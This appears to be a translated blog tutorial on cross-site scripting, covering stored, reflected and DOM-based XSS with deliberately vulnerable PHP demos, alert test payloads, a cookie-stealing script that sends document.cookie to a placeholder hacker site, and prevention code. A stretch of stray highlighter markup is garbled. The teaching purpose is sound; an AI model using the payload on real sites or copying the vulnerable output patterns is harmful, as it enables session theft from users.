Source: https://tienminhvy.com/kinh-nghiem/xss-la-gi-va-cach-phong-tranh
XSS is one of the best-known security vulnerabilities. Unlike SQL injection, an XSS attack is carried out mainly on the client side, with the aim of stealing user information.
What is XSS? XSS at a glance
XSS (short for Cross-Site Scripting) can be understood simply as a common attack in which a hacker takes advantage of a vulnerability to inject script code into a web page and then deliver it to users (or a user stumbles onto an infected page). Through this the hacker steals the user's cookies and uses them to log in to accounts on the website that was infected with the malicious code.
It is a simple attack, but it causes great damage to websites such as banking and e-commerce sites. It is also one of the security issues you must keep in mind when programming a web application.
How dangerous is XSS?
As I mentioned above, XSS is extremely dangerous because it causes a great deal of damage to a website, especially a business website. When a website is hit by XSS, both the website owner and its users suffer, and the website's reputation declines. In addition, the hacker can use the users' accounts for fraudulent purposes, and so on.
Some of the famous XSS attacks:
Classification and examples of XSS
Currently, there are 3 main types of XSS:
Stored XSS
Stored XSS is the basic form of XSS, commonly found in poorly secured web applications. With this bug, the hacker takes advantage of wherever it is found (such as a comment form, a website's technical-support page, and so on) to submit malicious code, which is sent to the database and stored there.
When a victim opens the comment page, the system fetches all comments (including the hacker's comment containing the malicious code) and prints them on the screen. As soon as the page finishes loading, the user's browser executes the malicious code (what it does depends on what the hacker inserted, for example code that collects the user's cookies).
Here is a small web application I wrote to demonstrate Stored XSS for you (for learning and demo purposes only):
```php
<?php
// Copyright © 2020 by tienminhvy.com, all rights reserved
// Please credit the source if you share this
$db = mysqli_connect('localhost', 'root', '', 'xss', 3306);
if (!$db) {
    die("<h1>Không thể kết nối đến cơ sở dữ liệu!</h1>");
}
if (isset($_POST['username'])) {
    // escaped for the SQL query only; the HTML characters are stored as-is
    $username = mysqli_real_escape_string($db, $_POST['username']);
    $msg = mysqli_real_escape_string($db, $_POST['msg']);
    $status = mysqli_query($db, "INSERT INTO msg (username, msg) VALUES ('$username', '$msg')");
    if (!$status) {
        die("ERROR");
    } else {
        header("Refresh: 0");
    }
}
$result = mysqli_query($db, "SELECT * FROM msg");
$content = '';
if (mysqli_num_rows($result) > 0) {
    while ($row = mysqli_fetch_assoc($result)) {
        // the stored fields are inserted into the markup as raw HTML: this is the Stored XSS
        $content .= <<<HTML
<div class="cmt">
<p class="cmt-username">Username: <b>@$row[username]</b></p>
<p class="cmt-msg">MSG: $row[msg]</p>
<div class="cmt-time">Time: $row[time]</div>
</div>
HTML;
    }
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Bình luận - XYZ</title>
</head>
<body>
<div class="cmt-section">
<h2>Comment Section</h2>
<?php echo $content ?>
</div>
<div class="cmt-form">
<form method='POST'>
<h2>Comment Form</h2>
<input type="text" name="username" placeholder="Your username">
<br>
<textarea name="msg" cols="30" rows="10" placeholder="Your comment here"></textarea>
<button type="submit">Send</button>
</form>
</div>
</body>
</html>
```
If you want to know what the mysqli_real_escape_string() function is for, see this article: What is SQL Injection and how to prevent it?
The small web app above is the comment section of a blog page, where users can enter whatever comments they want. And I am just an ordinary user who goes to the website's comment section to share my opinion with the website owner.
Because I am a bit naughty by nature, I will try to see whether this comment section has any security holes. After an unsuccessful check for SQL injection, I move on to testing for XSS by entering the line <script></script> and pressing Enter.
And surprisingly, in the MSG line I bolded, I couldn't see the message I had entered, so I checked the page source by pressing Ctrl + U.
Well, you can see my line in bold: this proves that the website already has the first type of XSS vulnerability. To make sure that the JavaScript code inside the script tag pair can actually be executed, I enter this line right in the comment form and click Send.
```html
<script>alert('Hacked!')</script>
```
And if the website pops up a message like this, it is 100% certain that this website has an XSS bug.
And here is our JavaScript snippet in the page source.
With this vulnerability, hackers can steal cookies and use them to impersonate users and log in to the website above. Or, more dangerously, use it to DDoS some other website. For example, to take advantage of it to steal the cookies of users who visit this comment page, I would use the following JavaScript:
```html
<script>window.location.assign("https://www.sitecuahacker.com/?cookie=" + document.cookie)</script>
```
And the cookies of every user who visits the above page are sent off to the hacker's site :v. Of course, who would actually do that :)
So what is the difference between this Stored XSS and the other two types? With this type of XSS, the hacker does not need any tricks to lure users to the website, because the malicious code above has already been stored in the database. Whenever a user visits that area, the website both loads the malicious code and executes it in the user's browser.
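As an added example (my own code, not the post's), here is the output stage of the comment page above rewritten so that a stored comment is displayed as text rather than executed. The point the post leaves implicit is that mysqli_real_escape_string() only protects the INSERT query: it leaves < > " ' untouched, so the stored payload reaches the browser as a real tag. The function names, the sample rows and the header values are my own choices.

```php
<?php
// Added example, not the original post's code: the output stage of the
// comment page above rewritten so that stored HTML is displayed as text
// instead of being executed. mysqli_real_escape_string() only protects
// the INSERT query; it leaves < > " ' untouched, so the browser still sees
// <script> as a tag. The fix is to encode for the HTML context at output.
declare(strict_types=1);

// Encode a string for an HTML element body or a quoted attribute value.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Same markup as the demo page, but every database field goes through e()
// before it is concatenated into the HTML.
function render_comments(array $rows): string
{
    $content = '';
    foreach ($rows as $row) {
        $content .= '<div class="cmt">'
            . '<p class="cmt-username">Username: <b>@' . e($row['username']) . '</b></p>'
            . '<p class="cmt-msg">MSG: ' . e($row['msg']) . '</p>'
            . '<div class="cmt-time">Time: ' . e($row['time']) . '</div>'
            . "</div>\n";
    }
    return $content;
}

// Defence in depth against the cookie-theft payload from the post: a cookie
// flagged HttpOnly is not readable through document.cookie, and a CSP
// without 'unsafe-inline' stops an injected inline <script> from running.
// Must be called before session_start() and before any output.
function harden_response(): array
{
    $cookie = [
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,   // sent over HTTPS only
        'httponly' => true,   // hidden from JavaScript
        'samesite' => 'Lax',
    ];
    $csp = "default-src 'self'; script-src 'self'; object-src 'none'";
    if (PHP_SAPI !== 'cli') {            // no headers to send when run from the shell
        session_set_cookie_params($cookie);
        header('Content-Security-Policy: ' . $csp);
    }
    return ['cookie' => $cookie, 'csp' => $csp];
}

// Constructed sample rows standing in for the result of "SELECT * FROM msg";
// the second row is the comment the post injected.
$sampleRows = [
    ['username' => 'alice',   'msg' => 'Nice post!',                         'time' => '2020-01-01 10:00:00'],
    ['username' => 'mallory', 'msg' => "<script>alert('Hacked!')</script>", 'time' => '2020-01-01 10:05:00'],
];

harden_response();
echo render_comments($sampleRows);
// The < and > of the injected comment now leave e() as &lt; and &gt;, so the
// browser shows the tag as text instead of executing it.
```

Run it from the shell with `php stored_fix.php` to see the encoded markup; in the real page, render_comments() replaces the heredoc loop and harden_response() is called at the very top, before the database work and before any output. Encoding at output time is the rule to remember: the same message may be safe in one context and dangerous in another, so the decision belongs where the HTML is produced, not where the data is stored.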
Reflected XSS
This is also a type of XSS, but the difference from the type above is that it is executed only on the client side (the user's browser) and is not saved to the website's database. To exploit this bug, the hacker needs to find the vulnerable spot in the web application and then craft a link to the vulnerable page.
Once the user opens that link, the server returns the page with the hacker's malicious code, which was included in the link.
For example, I wrote the small web application below to look up the user who sent a message to the website above (note that it is for learning and demo purposes only):
```php
<?php
// Copyright © 2020 by tienminhvy.com, all rights reserved
// Please credit the source if you share this
$db = mysqli_connect('localhost', 'root', '', 'xss', 3306);
if (!$db) {
    die("<h1>Không thể kết nối đến cơ sở dữ liệu!</h1>");
}
$content = '';
$username = '';
$usf = '';
$result = (object) array('num_rows' => 0);
if (isset($_GET['username'])) {
    // the raw query parameter is echoed back unescaped: this is the Reflected XSS
    $usf = '<p>You searched for "' . $_GET['username'] . '"</p>';
    $username = mysqli_real_escape_string($db, $_GET['username']);
    $result = mysqli_query($db, "SELECT * FROM msg WHERE username='$username'");
    if (mysqli_num_rows($result) > 0) {
        while ($row = mysqli_fetch_assoc($result)) {
            $content .= <<<HTML
<div class="cmt">
<p class="cmt-username">Username: <b>@$row[username]</b></p>
<p class="cmt-msg">MSG: $row[msg]</p>
<div class="cmt-time">Time: $row[time]</div>
</div>
HTML;
        }
    } else {
        $content = "Not Found!";
    }
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Bình luận - XYZ</title>
</head>
<body>
<form method='GET'>
<input value='<?php echo $username ?>' type="text" name="username" placeholder="Please username which you want to find">
<button type="submit">Find</button>
</form>
<div class="usf"><?php echo $usf ?></div>
<!-- the listing on the source page is cut off here -->
```
attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> comment-section <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token php language-php"><span class="token delimiter important"><?php</span> <span class="token keyword">echo</span> <span class="token variable">$content</span> <span class="token delimiter important">?></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> div</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> body</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> html</span> <span class="token punctuation">></span></span> |
For example, on this page users can search for the messages (comments) that they or other users have posted on the website.
Here, for instance, I search for a user named abc and click Find; the website returns all comments by the user abc.
And when I enter nothing in the box and click Find, the system returns the page shown below, but still shows the line You searched for "".
So I check whether the website owner properly encodes the script tag by entering <script></script> in the box; the website still returns the content as shown above.
However, when I pressed Ctrl + U to view the page source, the line highlighted in black caught my eye: it is possible that this website has an XSS vulnerability.
That alone is not enough, so I add an alert call to see whether the site shows a notification. I enter the following code in the box and press Enter:
<script>alert('Hacked!')</script>
And I got the result shown, so it is 100% certain that this website has a Reflected XSS vulnerability:
And here is the code we entered, as it appears in the page source.
DOM-based XSS
DOM-based XSS is a more advanced XSS vulnerability, and it is likewise caused by website owners not properly encoding user input. Unlike the two types above, however, the hacker does not exploit this flaw through an input box on the website but manipulates the browser's address bar directly. The way the payload is delivered is similar to Reflected XSS.
This type of vulnerability can occur on both dynamic and static websites, because it takes advantage of JavaScript that programmers have written loosely to manipulate the DOM (Document Object Model); as a result, it affects only the client (the user's browser).
For example, here is the source code of a demo website written by me:
```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <script>
        document.write("<b>Current URL</b> : " + document.baseURI);
    </script>
</body>
</html>
```
For example, when I open the page above, it displays the link I visited, taken from the address bar. And when I enter a URL of the following form
http://localhost/hoctap/xss_3.php#<script>alert('XSS')</script>
the website immediately shows the XSS error.
However, current web browsers seem to have prevented this case by escaping the string above into ordinary characters, so the method above is no longer effective on new browsers; older browsers, however, are still at risk of this security mistake!
How to avoid XSS
To limit and avoid XSS errors, you need to encode special characters when programming a web application. For PHP or another server-side language, if possible, you should apply both kinds of encoding as follows:
```php
<?php
// Copyright © 2020 by tienminhvy.com, all rights reserved
// Please credit the source if you share this
$db = mysqli_connect('localhost', 'root', '', 'xss', 3306);
if (!$db) {
    die("<h1>Không thể kết nối đến cơ sở dữ liệu!</h1>");
}
$noidung = "<script>alert('Hello World!')</script>";
$noidung = htmlspecialchars($noidung);
// Becomes: &lt;script&gt;alert('Hello World!')&lt;/script&gt;
// (with the default flags of PHP < 8.1; from PHP 8.1 on, the single quotes become &#039; as well)
$noidung = mysqli_real_escape_string($db, $noidung);
// Becomes: &lt;script&gt;alert(\'Hello World!\')&lt;/script&gt;
?>
```
As for DOM-based XSS, you should refer to the documentation of the JavaScript framework you are using, or restrict the use of methods and properties such as innerHTML, outerHTML and document.write and use textContent instead.
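The output encoding recommended above, as an added example written in JavaScript rather than taken from the article, so that it covers both the reflected search page and the DOM-based demo: the hypothetical escapeHtml is the counterpart of htmlspecialchars with ENT_QUOTES, and fragmentOf shows why the fragment URL from the DOM-based section no longer fires in current browsers.

```javascript
// Added example, not the article's code. escapeHtml does what PHP's
// htmlspecialchars does with ENT_QUOTES: it encodes the five characters
// that can break out of an HTML element or attribute context.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#039;',
};

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// The "You searched for" line of the search page, built the unsafe way
// (the article's demo echoes the value as-is) and the safe way (encoded
// on output, so the browser shows the tag instead of executing it).
function unsafeSearchedFor(username) {
  return '<p>You searched for "' + username + '"</p>';
}

function safeSearchedFor(username) {
  return '<p>You searched for "' + escapeHtml(username) + '"</p>';
}

// DOM-based case: the demo page writes document.baseURI into the page.
// The WHATWG URL parser (used by browsers and by Node's URL class)
// percent-encodes < and > in the fragment, which is why the article's
// URL no longer fires; a single quote is left alone, so the page must
// still encode the value itself instead of relying on the browser.
function fragmentOf(url) {
  return new URL(url).hash;
}

// Safe rendering of the "Current URL" line. In a browser, assign the
// text with textContent instead of building HTML; here the value is
// encoded explicitly so the result can be inspected outside a browser.
function safeCurrentUrlHtml(url) {
  return '<b>Current URL</b> : ' + escapeHtml(url);
}
```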
Summary
In this article I have introduced what XSS is, how dangerous it is, and the classification of XSS along with an example of each type of XSS vulnerability. If you have any questions, please do not hesitate to comment below so that I can answer them.
And don’t forget the unwritten rule: “Never trust user input”